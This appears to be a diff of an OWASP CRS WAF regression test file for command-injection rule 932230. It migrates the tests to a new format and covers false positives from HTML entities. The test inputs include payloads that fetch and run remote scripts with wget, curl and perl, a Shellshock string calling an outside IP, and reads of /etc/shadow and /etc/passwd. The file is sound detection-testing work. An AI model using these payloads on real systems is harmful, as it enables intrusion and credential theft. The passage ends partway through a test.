HTTP/1.0 - data: | - code=cat<<, Franziska Bühler, Felipe Zipitria, Max Leske, Esad Cetiner, Xhoenix, azurit" - description: "Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. \nIf you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule.\n" - enabled: true - name: 932230.yaml + description: | + Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. 
+ If you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule. +rule_id: 932230 tests: - - test_title: 932230-1 + - test_id: 1 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 2 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 3 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: 
"arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 4 desc: Like 932230-3 but instead of space sign using new line sign stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 5 desc: Another html entity - decimal 9977 (person with ball) with space sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 
- uri: "/post" - data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 6 desc: Another html entity - decimal 128 (euro) with new line sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 7 desc: arg value of ";ifconfig 
Something „The Title”. After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 8 desc: arg value of "Something „The Title”. 
After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 9 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - 
arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 10 desc: RCE from test 932230.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 11 desc: RCE from test 932230.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 12 desc: RCE from test 932230.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 13 desc: RCE from https://github.com/payloadbox/command-injection-payload-list and html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" - version: HTTP/1.1 - output: - log_contains: id "932230" 
- - test_title: 932230-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] + - test_id: 14 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932230] + - test_id: 15 desc: RCE from 
https://github.com/payloadbox/command-injection-payload-list combined with html entities
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-16
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=%0Acat%20/etc/passwd;&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 16
 desc: RCE from https://github.com/payloadbox/command-injection-payload-list combined with html entities
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
- version:
HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-17
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=()%20{%20:;};%20/bin/bash%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`top%20-a\\`\"&arg2=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 17
 desc: RCE ;top with html entities two digit decimal of 59 (;)
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=%26%2359%3B+;top"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-18
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=%26%2359%3B+;top"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 18
 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- 
headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-19
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "arg=<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something"
+ version: HTTP/1.1
+ output:
+ log:
+ no_expect_ids: [932230]
+ - test_id: 19
 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip, deflate, br
- Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
- Content-Type: application/x-www-form-urlencoded
- method: POST
- port: 80
- uri: "/post"
- data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->"
- version: HTTP/1.1
- output:
- no_log_contains: id "932230"
- - test_title: 932230-20
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate, br
